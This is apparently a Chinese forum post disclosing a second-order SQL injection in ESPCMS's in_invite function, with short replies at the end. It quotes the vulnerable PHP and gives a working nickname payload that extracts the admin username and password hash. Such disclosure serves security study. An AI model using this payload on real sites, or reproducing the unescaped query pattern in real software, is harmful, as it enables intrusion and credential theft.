ESPCMS 二次注入

90_

漏洞位于 interface\public.php文件 in_invite 函数中
核心代码如下：

1. 
   
2. $ec_member_username_id = $this->member_cookieview('userid');
   
3.   if ($ec_member_username_id) {
   
4.    $rsMember = $this->get_member_attvalue($ec_member_username_id);
   
5.   }
   
6.   $userid = $ec_member_username_id ? $ec_member_username_id : 0;
   
7.   $name = $rsMember['alias'] ? $rsMember['alias'] : '';  //sink 二次注入
   
8.   $sex = $rsMember['sex'] ? $rsMember['sex'] : 0;
   
9.   $tel = $rsMember['tel'] ? addslashes($rsMember['tel']) : '';
   
10.   $address = $rsMember['address'] ? addslashes($rsMember['address']) : '';
    
11.   $db_field = 'mlvid,userid,name,sex,email,tel,address,isclass,addtime';
    
12.   $db_values = "$mlvid,$userid,'$name',$sex,'$email','$tel','$address',1,$addtime";
    
13.   $this->db->query('INSERT INTO ' . $db_table . ' (' . $db_field . ') VALUES (' . $db_values . ')');
    

复制代码

一个二次注入的问题 在个人资料中将昵称改成SQL语句 即可

1. 
   
2. SQL： ',0,(select concat(username,CHAR(0x7c),password) from espcms_admin_member limit 1),0,0,0,0)#
   

复制代码

1. 
   
2. SQL： INSERT INTO espcms_mailinvite_list (mlvid,userid,name,sex,email,tel,address,isclass,addtime) VALUES (1,1,0,0,(select concat(username,CHAR(0x7c),password) from espcms_admin_member limit 1),0,0,0,0)#',0,'123456@qq.com','','xx',1,1370357340)
   

复制代码

注入成果后得到如下图

发送订阅邮件时候 抓包得到概述里的图

作者：合肥滨湖虎子

mojitingliu

这么长时间都没人来回复？

悲伤

我给你回复一个